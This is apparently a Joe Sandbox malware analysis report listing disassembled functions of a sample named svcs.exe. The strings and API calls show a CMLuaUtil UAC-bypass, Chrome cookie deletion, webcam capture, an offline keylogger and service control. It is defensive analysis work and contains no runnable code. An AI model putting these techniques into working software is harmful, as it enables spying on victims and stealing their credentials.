                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\microsofts\svcs.exe), ref: 004075D0
                                  • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                • CoUninitialize.OLE32 ref: 00407629
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitializeObjectUninitialize_wcslen
                                • String ID: C:\Users\user\AppData\Roaming\microsofts\svcs.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                • API String ID: 3851391207-330212333
                                • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                • GetLastError.KERNEL32 ref: 0040BAE7
                                Strings
                                • UserProfile, xrefs: 0040BAAD
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                • [Chrome Cookies not found], xrefs: 0040BB01
                                • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                • Opcode Fuzzy Hash: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407260 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: SG$C:\Users\user\AppData\Roaming\microsofts\svcs.exe$hdF
                                • API String ID: 0-2415698853
                                • Opcode ID: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                • Opcode Fuzzy Hash: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$PkGNG$mscoree.dll
                                • API String ID: 4061214504-213444651
                                • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                Download Yara Rule
                                APIs
                                • __allrem.LIBCMT ref: 0043AC69
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                • __allrem.LIBCMT ref: 0043AC9C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                • __allrem.LIBCMT ref: 0043ACD1
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: H_prologSleep
                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                • API String ID: 3469354165-3054508432
                                • Opcode ID: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                • Opcode Fuzzy Hash: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                                • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                • Opcode Fuzzy Hash: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                                • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID: PkGNG
                                • API String ID: 1036877536-263838557
                                • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                • _free.LIBCMT ref: 0044824C
                                • _free.LIBCMT ref: 00448274
                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                • _abort.LIBCMT ref: 00448293
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                • Opcode Fuzzy Hash: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                • Opcode Fuzzy Hash: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                • API String ID: 276877138-0
                                • Opcode ID: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
                                • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                • Opcode Fuzzy Hash: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
                                • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                • wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                • API String ID: 1497725170-248792730
                                • Opcode ID: a7c6f27475bfec295d022b2ba5d983e1240c8cfcb4a2fe4930fa699ea7be73b7
                                • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                • Opcode Fuzzy Hash: a7c6f27475bfec295d022b2ba5d983e1240c8cfcb4a2fe4930fa699ea7be73b7
                                • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSizeSleep
                                • String ID: XQG
                                • API String ID: 1958988193-3606453820
                                • Opcode ID: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
